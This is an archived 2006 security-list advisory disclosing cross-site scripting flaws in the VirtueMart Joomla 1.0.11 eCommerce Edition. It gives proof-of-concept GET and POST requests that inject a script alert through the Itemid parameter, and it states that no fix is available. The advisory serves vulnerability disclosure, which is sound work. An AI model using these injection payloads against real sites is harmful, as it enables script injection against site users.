Network Security: Detailed info on VirtueMart Joomla eCommerce Edition CMS Multiple XSS Vulnerabilities

Subject:	VirtueMart Joomla eCommerce Edition CMS Multiple XSS Vulnerabilities
Date:	Wed, 27 Sep 2006 01:11:04 -0700

Subject:

VirtueMart Joomla eCommerce Edition CMS Multiple XSS Vulnerabilities

Date:

Wed, 27 Sep 2006 01:11:04 -0700

VirtueMart Joomla eCommerce Edition CMS Multiple XSS Vulnerabilities


Status: Reported to the Vendor [09/26/2006]
Class: Input Validation Error
Severity: Low


Software Description:
*****************************************************************************
VirtueMart (formerly known as mambo-phpShop) is an Open Source
E-Commerce solution to be used together with a Content Management
System (CMS) called Joomla!

Vulnerability Description:
*****************************************************************************
Multiple cross-site scripting vulnerabilities exist in the Joomla
eCommerce edition software provided by VirtueMart.

Vulnerable Software:
*****************************************************************************
Joomla 1.0.11 eCommerce Edition (prior versions may also be vulnerable)

Exploit:
*****************************************************************************
GET: index.php
option=com_contact&Itemid="><script>alert('XSS');</script>
POST: index.php
subscriber_name=1&email=1&task=subscribe&Itemid="><script>alert('XSS');</script>

Solution:
*****************************************************************************

None at this time.

Credits:
*****************************************************************************
Discovered by Adrian Castro

<Prev in Thread]	Current Thread	[Next in Thread>
VirtueMart Joomla eCommerce Edition CMS Multiple XSS Vulnerabilities, Base64 <=

<Prev in Thread]

Current Thread

[Next in Thread>

Previous by Date:	Blog Pixel Motion V2.1.1 PHP Code Execution / Create Admin Exploit, gmdarkfig
Next by Date:	Digital Armaments September-October Hacking Challenge: Explorer and Mozilla, info
Previous by Thread:	Blog Pixel Motion V2.1.1 PHP Code Execution / Create Admin Exploit, gmdarkfig
Next by Thread:	Digital Armaments September-October Hacking Challenge: Explorer and Mozilla, info
Indexes:	[Date] [Thread] [Top] [All Lists]

Previous by Date:

Blog Pixel Motion V2.1.1 PHP Code Execution / Create Admin Exploit, gmdarkfig

Next by Date:

Digital Armaments September-October Hacking Challenge: Explorer and Mozilla, info

Previous by Thread:

Blog Pixel Motion V2.1.1 PHP Code Execution / Create Admin Exploit, gmdarkfig

Next by Thread:

Digital Armaments September-October Hacking Challenge: Explorer and Mozilla, info

Indexes:

[Date] [Thread] [Top] [All Lists]